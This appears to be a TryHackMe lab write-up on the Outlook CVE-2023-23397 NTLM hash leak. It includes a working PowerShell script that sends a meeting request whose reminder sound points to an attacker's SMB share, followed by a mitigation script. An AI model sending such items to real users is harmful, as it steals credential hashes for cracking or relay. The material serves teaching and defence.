TryHackMe - Outlook NTLM Leak
NTLM stands for New Technology LAN Manager.
Learn how to leak a user's password hash by sending them an email that abuses CVE-2023-23397. Unlike most exploits, this one is particularly dangerous because it is zero-click: no user interaction is required to trigger it. Once the malicious email lands in the user's inbox and the reminder fires, the attacker obtains the user's Net-NTLMv2 response (the "hash"). With that in hand, malicious actors can attempt to crack it offline to recover the password, or relay it to authenticate to other systems and escalate privileges.
The steps are:
- Abusing Appointment Alerts: abusing reminder sounds via UNC paths.
- Crafting a Malicious Appointment: set up Responder on the attacker's machine, create an appointment with a reminder, and install OutlookSpy so a script can be run inside Outlook that points the reminder sound at the attacker's UNC path.
- Weaponizing the Vulnerability: create a malicious meeting/appointment with a custom reminder sound pointing to a UNC path on the attacker's machine, so the victim's Outlook authenticates to that host when the reminder triggers.
- Detection/Mitigation: discuss a few ways to detect this attack on the host via Sigma rules and YARA rules.
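The crafting step above, as an added PowerShell example (this is not the room's own OutlookSpy script): it drives Outlook's COM object directly, so OutlookSpy is not needed, and sets the two MAPI named properties that carry the custom reminder sound. The property identifiers (PSETID_Common, PidLidReminderFileParameter 0x851F and PidLidReminderOverride 0x851C) are from the MS-OXPROPS specification; the attacker IP, share name and recipient address are assumed lab values. Run it on a lab host with Outlook installed while Responder is listening on the attacker host.

```powershell
# Added example (not from the TryHackMe room): create an appointment whose reminder sound
# is a UNC path on the attacker host, the CVE-2023-23397 trigger described above.
# Assumed lab values: attacker/Responder host, share name, victim address.
$AttackerIp = "10.10.10.10"
$UncPath    = "\\$AttackerIp\share\reminder.wav"
$Victim     = "victim@lab.local"

# MAPI named properties in PSETID_Common {00062008-0000-0000-C000-000000000046} (MS-OXPROPS):
#   0x851F PT_UNICODE (001F)  PidLidReminderFileParameter - path of the custom reminder sound
#   0x851C PT_BOOLEAN (000B)  PidLidReminderOverride      - tell Outlook to use that custom sound
$Base = "http://schemas.microsoft.com/mapi/id/{00062008-0000-0000-C000-000000000046}/"
$PidLidReminderFileParameter = $Base + "851F001F"
$PidLidReminderOverride      = $Base + "851C000B"

$Outlook = New-Object -ComObject Outlook.Application
$Appt    = $Outlook.CreateItem(1)          # OlItemType.olAppointmentItem = 1

$Appt.Subject                    = "Lab: reminder sound test"
$Appt.Start                      = (Get-Date).AddMinutes(2)
$Appt.Duration                   = 15      # minutes
$Appt.ReminderSet                = $true
$Appt.ReminderMinutesBeforeStart = 0       # fire the reminder as soon as the item starts

# Point the reminder sound at the attacker's share. When the reminder fires, Outlook tries to
# open the file over SMB and authenticates to the host, leaking the Net-NTLMv2 response.
$Appt.PropertyAccessor.SetProperty($PidLidReminderFileParameter, $UncPath)
$Appt.PropertyAccessor.SetProperty($PidLidReminderOverride, $true)

# Turn it into a meeting request so the crafted item reaches the victim's mailbox.
$Appt.MeetingStatus = 1                    # OlMeetingStatus.olMeeting = 1
[void]$Appt.Recipients.Add($Victim)
$Appt.Recipients.ResolveAll() | Out-Null
$Appt.Send()
```

On the attacker side, Responder's SMB module answers the connection and records the NTLMv2-SSP response; if outbound 445 is blocked but the WebClient service is running, Outlook falls back to WebDAV, which is why the mitigation list below covers both.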
Mitigation strategies
- Add users to the Protected Users security group; members of that group are refused NTLM authentication and must use Kerberos, so a leaked Net-NTLMv2 response cannot be relayed or used to authenticate as them.
- Block outbound TCP 445/SMB from your network at the perimeter so the victim's Outlook cannot reach the attacker's share and no post-exploitation connection is possible.
- Use the PowerShell script released by Microsoft to scan the Exchange server's mailbox items (messages, calendar items and tasks) for the reminder-sound property this attack abuses, to detect any attack attempt.
- Disable the WebClient service to prevent Outlook from falling back to a WebDAV connection over HTTP/HTTPS when SMB is blocked.
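The host- and domain-side mitigations above, applied and verified from an elevated PowerShell session on a domain-joined host, as an added example (not from the room). The account name is an assumed lab value; the Protected Users step assumes the ActiveDirectory RSAT module is installed. The Exchange-side scan with Microsoft's script is run separately on the Exchange server and is not repeated here.

```powershell
# Added example (not from the TryHackMe room): apply and verify the mitigations listed above.
# Run elevated on a domain-joined host; step 1 needs the ActiveDirectory module (assumption).
$User = "alice"   # assumed lab account

# 1. Protected Users: members are refused NTLM authentication, so a leaked Net-NTLMv2 response
#    cannot be relayed. Note this also blocks NTLM for legitimate use by that account.
Add-ADGroupMember -Identity "Protected Users" -Members $User
Get-ADGroupMember -Identity "Protected Users" | Select-Object -ExpandProperty SamAccountName

# 2. Block outbound SMB to non-local addresses so the reminder UNC path never reaches an
#    external listener. The "Internet" keyword scopes the rule to addresses outside the local
#    subnets; drop it (or use -RemoteAddress Any) if internal SMB must be blocked too.
New-NetFirewallRule -DisplayName "Block outbound SMB (CVE-2023-23397)" `
    -Direction Outbound -Protocol TCP -RemotePort 445 -RemoteAddress Internet `
    -Action Block -Profile Any

# 3. Disable WebClient so Outlook cannot fall back to WebDAV over 80/443 once 445 is blocked.
Stop-Service -Name WebClient -Force -ErrorAction SilentlyContinue
Set-Service -Name WebClient -StartupType Disabled

# 4. Verify the host state after the changes.
(Get-NetFirewallRule -DisplayName "Block outbound SMB (CVE-2023-23397)").Enabled
Get-Service -Name WebClient | Select-Object Name, Status, StartType
```

A practical caveat: the firewall rule and WebClient change protect the host regardless of Outlook version, but they do not remove already-delivered malicious items; that is what the Exchange-side scan and the Outlook security update are for.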